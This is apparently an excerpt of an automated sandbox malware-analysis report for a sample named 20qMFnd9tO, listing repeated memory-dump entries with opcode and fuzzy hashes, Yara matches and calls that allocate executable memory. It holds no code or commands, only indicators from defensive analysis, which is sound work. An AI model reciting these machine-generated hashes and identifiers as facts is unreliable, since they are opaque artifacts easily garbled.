                                              • Instruction Fuzzy Hash: 9A313275208315AFE710CF14DC84B1BBBE8EB89754F10492DFAA4973D0D775A9088B97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 006F9F08
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 006F9F6F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: ,
                                              • API String ID: 292159236-3772416878
                                              • Opcode ID: 0611d15885a3dbbd9c50aa940e03470727d33db14537f0f80ce13edc545bdf30
                                              • Instruction ID: 94df48ca65ea96c96877ff4d151c78df900b284f20f1658aae01415a401decdc
                                              • Opcode Fuzzy Hash: 0611d15885a3dbbd9c50aa940e03470727d33db14537f0f80ce13edc545bdf30
                                              • Instruction Fuzzy Hash: 9E312B75108314AFD710CF15CC44B6BBBE5FB89754F148A2CFAA99B390D77198088B97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: IQPS$Y=Y?$qw$uk
                                              • API String ID: 0-3965859587
                                              • Opcode ID: f7be5749a5b58e2cc3b508d5bf0a65a67ce16adbd5ef003d977847e3760ef88f
                                              • Instruction ID: 6938d5b8d17a152dfff45fba4c889b86ab6e91c84868222a209575a63c533b21
                                              • Opcode Fuzzy Hash: f7be5749a5b58e2cc3b508d5bf0a65a67ce16adbd5ef003d977847e3760ef88f
                                              • Instruction Fuzzy Hash: CCD149B0500B458FD324CF25C491B22FBB1BF46304F148A9CD8A68BB96D335E999CBD5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: IQPS$Y=Y?$qw$uk
                                              • API String ID: 0-3965859587
                                              • Opcode ID: f7be5749a5b58e2cc3b508d5bf0a65a67ce16adbd5ef003d977847e3760ef88f
                                              • Instruction ID: c13108cdc038a3dcfa55a7536e8cff8fa4c5d81cf29e907e2243abdabd9cb134
                                              • Opcode Fuzzy Hash: f7be5749a5b58e2cc3b508d5bf0a65a67ce16adbd5ef003d977847e3760ef88f
                                              • Instruction Fuzzy Hash: 1ED138B4600B419BD324CF25D491753FBB1BF46304F148A5CD8A68BB86D334E999CBD8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: P4@$P4@$p4@
                                              • API String ID: 0-2199205690
                                              • Opcode ID: 076a281b47144c3ac77265214b062b38a2854ec1666f9654a066a412db6bd952
                                              • Instruction ID: 7dfe8c25eedf065226f00a774ea048037986e564cb8c77fdcc1813c2d91bc8bc
                                              • Opcode Fuzzy Hash: 076a281b47144c3ac77265214b062b38a2854ec1666f9654a066a412db6bd952
                                              • Instruction Fuzzy Hash: E741A1B1611B448BDB18CF1AC8C475237E2AF84329F58C0A9DD028F78AD779C989CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$GetProcAddress.$l
                                              • API String ID: 0-2784972518
                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction ID: 00360f923b02206ba4e0abf178a40f94604574d281b8d41a332c48d6b120a506
                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction Fuzzy Hash: 343139B6901749DFEB10CF99C884AADBBF6FF48324F14504AD441A7312D7B1EA85CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0$8
                                              • API String ID: 0-46163386
                                              • Opcode ID: 13fd5802931d0de33f504ea7c591f14101949059d373c8000e43e9c38a0c0259
                                              • Instruction ID: 3944dc6371330bf47b284e3479ab6204edcfc66dbba30dec607243105356592b
                                              • Opcode Fuzzy Hash: 13fd5802931d0de33f504ea7c591f14101949059d373c8000e43e9c38a0c0259
                                              • Instruction Fuzzy Hash: 428233716083419FD720CF28C880B9BBBE1AF88314F14892EF8999B391D779D954DF96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 006FA3D0
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 006FA419
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 45ca6c8b52c7945cd4000329464f479dbb13c57cdebb73670de01e2d8e68058c
                                              • Instruction ID: 400a8f8389c9e959e212f9d7095a489eed850c30e85389aeec269b9d058510ed
                                              • Opcode Fuzzy Hash: 45ca6c8b52c7945cd4000329464f479dbb13c57cdebb73670de01e2d8e68058c
                                              • Instruction Fuzzy Hash: F2A1D0B15083158BDB10DF54C842BBA73F2EF81324F09492CEA998B390E775E905CB97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00718533
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00718594
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: ee5c6596bc607baf826687c62190f65d39e3832d480b2c6899ec3ae65ebca079
                                              • Instruction ID: eb6be1cc98cdbbe33bd20142a5f6e62944e3bce4d0d4c7a5816761033f3277f8
                                              • Opcode Fuzzy Hash: ee5c6596bc607baf826687c62190f65d39e3832d480b2c6899ec3ae65ebca079
                                              • Instruction Fuzzy Hash: A481C2715083519FC315CF28C880A6BFBE5AFD5318F19862CF89987392DB78D945CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2946a785a7335dce04309b2b89095e2828e62c30e1c85b38bab3a1f00ec962b8
                                              • Instruction ID: f80ceb456aeb1a5ea994331d4b78738500db42a61bc63d3334432e042865c150
                                              • Opcode Fuzzy Hash: 2946a785a7335dce04309b2b89095e2828e62c30e1c85b38bab3a1f00ec962b8
                                              • Instruction Fuzzy Hash: F451BF75544B828FD725CF24C814BA2BBF4BB46308F184A6DD1EBCB292DB78B509CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FAB30
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006FAB8C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 082dbad38d3ba6fb83ba1681b206c15d9d29b39d061a9f39a0ef98299718129f
                                              • Instruction ID: 2c9dbf7ebd96299b53bc55ebe5f0a5d626b93c639aa0ef38fbfc69ad3369bebe
                                              • Opcode Fuzzy Hash: 082dbad38d3ba6fb83ba1681b206c15d9d29b39d061a9f39a0ef98299718129f
                                              • Instruction Fuzzy Hash: CE5129725087908FD325CF18C890B6ABBE1BB85314F09866CE9FA973D1C734D908CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ido1$kvri
                                              • API String ID: 0-1372408504
                                              • Opcode ID: f65a3c888cac63b7f75acb57a02f369a9874bfff2bca6b5a80168ecacc476a3f
                                              • Instruction ID: 96564d6273c67ba805181d0be9a2ca98394e4a970a59f510d69de36d61bcb532
                                              • Opcode Fuzzy Hash: f65a3c888cac63b7f75acb57a02f369a9874bfff2bca6b5a80168ecacc476a3f
                                              • Instruction Fuzzy Hash: F0324D70144B928AE725CB34C498BE3BBE1AF16309F044A6DD4FB8B283D779654ACB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ido1$kvri
                                              • API String ID: 0-1372408504
                                              • Opcode ID: 97d47b0abb8866480f44754dc735a4b115dcf3b84d48fbb1c07c0b21aa749e4a
                                              • Instruction ID: 86855c0ea6550c01114970bd1b4b94f48ae981f7cc34897ea8b9019a55a83153
                                              • Opcode Fuzzy Hash: 97d47b0abb8866480f44754dc735a4b115dcf3b84d48fbb1c07c0b21aa749e4a
                                              • Instruction Fuzzy Hash: 67324D70144B928AE726CF34C498BE3BBE1AF16309F04496DD4FB8B283D779654ACB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ido1$kvri
                                              • API String ID: 0-1372408504
                                              • Opcode ID: 8ce99b25c8e92c780c8398b980d499503a4318c2435ec1036843c074f629d874
                                              • Instruction ID: f630426f979158805daf7a8a99d007512fea1d86f46a7eee2c6d2f5485f05ea7
                                              • Opcode Fuzzy Hash: 8ce99b25c8e92c780c8398b980d499503a4318c2435ec1036843c074f629d874
                                              • Instruction Fuzzy Hash: AD222A70144B828AE726CF34C494BE2BBE1BF16308F544A6DD0FB8B683D779654ACB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00712C59
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00712CAC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8c40ab01cc09802f46cf35142ebcf66c07ac878455954d87856e22ef8e907354
                                              • Instruction ID: 9bee77e16d600c202434763d09926ea7d12558f8b64b19bd09dadda04dc59b88
                                              • Opcode Fuzzy Hash: 8c40ab01cc09802f46cf35142ebcf66c07ac878455954d87856e22ef8e907354
                                              • Instruction Fuzzy Hash: BF3149B11083049FE714CF08C854B5BBBE4EB85358F148A2CF4A99B2D1E779D949CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004329F2
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00432A45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8c40ab01cc09802f46cf35142ebcf66c07ac878455954d87856e22ef8e907354
                                              • Instruction ID: 630e8df523fa24365d988a07fb3963ad9a2578550b726720262826eedc18132f
                                              • Opcode Fuzzy Hash: 8c40ab01cc09802f46cf35142ebcf66c07ac878455954d87856e22ef8e907354
                                              • Instruction Fuzzy Hash: 64313BB12083049FE714CF05C944B5FBBE4EF89358F148A2DF4A99B390D7B59909CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006F3F66
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006F3FCD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 955dae054f5160a71a8c9ee6e973716698318e9fb30d1cf8952eb4a9c188ffb6
                                              • Instruction ID: c99819a869b22bfe9189757c01eb6868686d84c78f56f34b0e95b4320bf61184
                                              • Opcode Fuzzy Hash: 955dae054f5160a71a8c9ee6e973716698318e9fb30d1cf8952eb4a9c188ffb6
                                              • Instruction Fuzzy Hash: F5316D75240B108FE724CF24C840B6677E5EB49324F248A2CD6AB9BBE0D771B805CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00413CFF
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00413D66
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 955dae054f5160a71a8c9ee6e973716698318e9fb30d1cf8952eb4a9c188ffb6
                                              • Instruction ID: 21eb2697629b630e83246217d921541e3c59abb72e668720b3aeedc93f2f2766
                                              • Opcode Fuzzy Hash: 955dae054f5160a71a8c9ee6e973716698318e9fb30d1cf8952eb4a9c188ffb6
                                              • Instruction Fuzzy Hash: BD316975240B008FE324CF24D880B5677E5EB49324F248A2CE6ABDBBE0D775B845CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 006F79B7
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000010,00008000), ref: 006F7A1F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: d9594c6ddb305b903f30f84e4b86404cb2dbae670454285bf974dc73d80ebd2f
                                              • Instruction ID: 735d3527ffca49e2ffb687e9ac96b2d956c85b4227135fafc10d41fcea910679
                                              • Opcode Fuzzy Hash: d9594c6ddb305b903f30f84e4b86404cb2dbae670454285bf974dc73d80ebd2f
                                              • Instruction Fuzzy Hash: 42317E752083419FE714CF14C844B6AB7E5FBC9314F148A2CE6A9DB3E1DB749809CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                                • Part of subcall function 00432120: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004321B4
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 00417750
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000010,00008000), ref: 004177B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: AllocateMemoryVirtual$FreeHeap
                                              • String ID:
                                              • API String ID: 2385414463-0
                                              • Opcode ID: 375d12db5c11158649309a1c01c856e34b76c39b6669aef9d4ab46117e80865c
                                              • Instruction ID: 0ce15bc2498f235bc05f3c00611671d7869645051154cf2f7f772c77464e27e6
                                              • Opcode Fuzzy Hash: 375d12db5c11158649309a1c01c856e34b76c39b6669aef9d4ab46117e80865c
                                              • Instruction Fuzzy Hash: 9031AD752087408FE714CF18C844B6BB7E5FB89314F148A2DE6A9CB3E0DB749809CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006F4053
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006F40A2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 9bf40b4569f0c21100635e816a9cd546978a5b0228d36040ec449cc62cb513ca
                                              • Instruction ID: be9ae3bc8bdd74f6c0fb798264c08eb65f756b84ffbb12f7481fb5d26f8e721f
                                              • Opcode Fuzzy Hash: 9bf40b4569f0c21100635e816a9cd546978a5b0228d36040ec449cc62cb513ca
                                              • Instruction Fuzzy Hash: BB317075100B008FE724CF28C844B5A77F5FB48304F148A2CE6AB8B7A0D776E945CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00413DEC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00413E3B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 9bf40b4569f0c21100635e816a9cd546978a5b0228d36040ec449cc62cb513ca
                                              • Instruction ID: c06454d7773366c128b88dccc3ec436e56a8a3480ed7697c2bbc442290591d12
                                              • Opcode Fuzzy Hash: 9bf40b4569f0c21100635e816a9cd546978a5b0228d36040ec449cc62cb513ca
                                              • Instruction Fuzzy Hash: C131AF75240B008FE724CF28D840B5A77F5FB48304F048A2CE6AB8BBA0D775E849CB84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 007174CC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00717524
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8658342b72303bdb5dcf044743d588e8f186c13abbcc6335f68c62d6f4af87bf
                                              • Instruction ID: a615c9266439a915f23d97506fccb7f4f9cd3fe0f1da946b889329629cd77620
                                              • Opcode Fuzzy Hash: 8658342b72303bdb5dcf044743d588e8f186c13abbcc6335f68c62d6f4af87bf
                                              • Instruction Fuzzy Hash: 5B318175108705AFD714CF08D844B9EBBE8EB85324F00862CF9A4973D1E774D948CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 006F69C3
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 006F6A18
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 4d1564886dd15fbc451907a0650df2c02c7b50044f79724ef898f624542a511d
                                              • Instruction ID: 13ff946a4b9bc756991bafc99ad20709fb476a852cdabe4d2203decdca26573a
                                              • Opcode Fuzzy Hash: 4d1564886dd15fbc451907a0650df2c02c7b50044f79724ef898f624542a511d
                                              • Instruction Fuzzy Hash: B4319AB56187448FD714CF28C840B6AB7E5FB88318F144A2CF5A99B3A0D774D904CB8A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FDD95
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006FDDE4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 158884f2b32dd0cf146f0035c1af637db578379ed14bc00a3b096cb4a9d2a651
                                              • Instruction ID: 5af6622361df7ae07fb97e7f4efb63ff1e2f741be4e235232e570172a7e0ff41
                                              • Opcode Fuzzy Hash: 158884f2b32dd0cf146f0035c1af637db578379ed14bc00a3b096cb4a9d2a651
                                              • Instruction Fuzzy Hash: 75312675210B148FD734CF24C884B56B7F6FB09318F448A2CDAAA87B90D771B809CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00712E8C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00712ED6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: fc214ef5ae3b6e8d171668c5d73ee056851389741c8a885e068136cc23099b51
                                              • Instruction ID: c322b0c5ff65f9897142fed941101916d90a11229ebee22028b6dfa200c8d151
                                              • Opcode Fuzzy Hash: fc214ef5ae3b6e8d171668c5d73ee056851389741c8a885e068136cc23099b51
                                              • Instruction Fuzzy Hash: 7231B171204300AFD714CF18C848B5E77E4EB85318F14852CE9A99B3D1D775888DCB97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00432C25
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00432C6F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: fc214ef5ae3b6e8d171668c5d73ee056851389741c8a885e068136cc23099b51
                                              • Instruction ID: 5b9ed0d47774f8385766d8461fb0e252f125b3ef58cb4fe83cd954a34667a81e
                                              • Opcode Fuzzy Hash: fc214ef5ae3b6e8d171668c5d73ee056851389741c8a885e068136cc23099b51
                                              • Instruction Fuzzy Hash: A131B1712043019FE714CF14C944B1FB7E4EB89318F14952DE5A88B3D0D7B59849CBD6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FDF1E
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006FDF71
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8077b765d2f01fafac2b4f14513b8ec513e0ce0fb36ae7632bc643084f448ab9
                                              • Instruction ID: 8e449749742e58b5b1f1b1dd327829eb5986892717dbfd98767e4fdb3ec6057f
                                              • Opcode Fuzzy Hash: 8077b765d2f01fafac2b4f14513b8ec513e0ce0fb36ae7632bc643084f448ab9
